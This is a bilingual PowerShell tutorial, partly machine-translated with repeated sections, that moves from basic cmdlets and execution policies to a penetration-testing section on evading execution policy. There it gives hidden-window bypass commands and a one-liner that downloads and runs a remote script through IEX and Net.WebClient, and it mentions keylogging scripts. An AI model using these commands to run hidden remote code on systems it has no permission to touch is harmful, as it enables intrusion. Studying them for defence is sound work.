Windows powershell is a command-line shell and scripting environment, which is built above win7 versions of the operating system, the command-line users and script writers can use the power of the .NET Framework. powershell program can be run directly in memory, can be expanded as cmd.exe command prompt.
View version information powershell
Get-Host 或者 $PSVersionTable.PSVersion
basic concepts
1. .ps1 file
A powershell script is actually a simple text file that contains multiple powershell commands, each command is shown as a separate line.
2. Execution Policy
To prevent the running of malicious scripts, powershell have an execution strategy, the execution policy is set by default to be limited.
When powershell script can not be executed, you can use the following cmdlet to determine the current execution policy.
Get-ExecutionPolicy
Restricted: script can not run (the default setting)
RemoteSigned: script can be run locally created, but the script does not run the downloaded online (excluding own digital signature)
AllSigned: only when the script is signed by a trusted publisher in order to run
Unrestricted: allow all scripts to run the script
Powershell execution policy can be set through the following cmdlet
Set-ExecutionPolicy <policy nmae>
3. Run the script
C:\test\1.ps1
. \ 2.ps1
4. Pipeline
After the input is outputted as a command before a command
Suppose you want to stop all current procedures to "p" at the beginning of
get-process p* | stop-process
First, the basic command
To file operations as an example
1. Create a new directory
New-Item whitecellclub-ItemType Directory
2. Create a new file
New-Item light.txt-ItemType File
3.删除目录
Remove-Item whitecellclub
4.显示文件内容
Get-Content test.txt
5.设置文本内容
Set-Content test.txt-Value"Hello World!"
6.追加内容
Add-Content light.txt-Value"i love you"
7.清除内容
Clear-Content test.txt
二、执行策略
获取执行策略
Get-ExecutionPolicy
策略分以下几种:
Restricted: 脚本不能执行(默认)
RemoteSigned: 本地创建的脚本可以运行,但从网上下载的脚本不能运行(拥有数字证书签名的除外)。
AllSigned: 仅当脚本由受信任的发布者签名时才能运行。
Unrestricted: 允许所有的script运行
可以使用如下命令格式设置PowerShell的执行策略
Set-ExecutionPolicy <Policy name>
命令行下输入powershell进入powershell命令行,输入help查看帮助信息。
三、绕过策略来执行脚本
如果要运行PowerShell脚本程序,必须用管理员权限将Restricted策略改成Unrestricted,所以,在渗透时,需要采用一些方法绕过策略来执行脚本
1.绕过本地权限执行
上传xxx.ps1到目标服务器,在CMD环境下,在目标服务器本地执行该脚本
PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1
2.本地隐藏绕过权限执行脚本
PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NonInteractive -NoProfile -File xxx.ps1
3.用IEX下载远程PS1脚本绕过权限执行
PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Nonl IEX (New-ObjectNet.WebClient).DownloadString("xxx.ps1");[Parameters]
以上命令的参数说明:
ExecutionPolicy Bypass : 绕过执行安全策略,这个参数非常重要,在默认情况下,PowerShell的安全策略规定了PowerShell不允许运行命令和文件。通过设置这个参数,可以绕过任意一个安全规则。在渗透测试中,基本每一次运行PowerShell脚本时都要使用这个参数。
WindowStyle Hidden : 隐藏窗口
NoLogo : 启动不显示版权标志的PowerShell
NonInteractive (-Nonl) : 非交互模式,Po
werShell不为用户提供交互的提示
NoProfile (-Nop): PowerShell控制台不加载当前用户的配置文件
Noexit : 执行后不退出Shell。这在使用键盘记录等脚本时非常重要。
PowerShell脚本在默认情况下无法直接运行,这时就可以使用上述三种方法绕过安全策略,运行PowerShell脚本。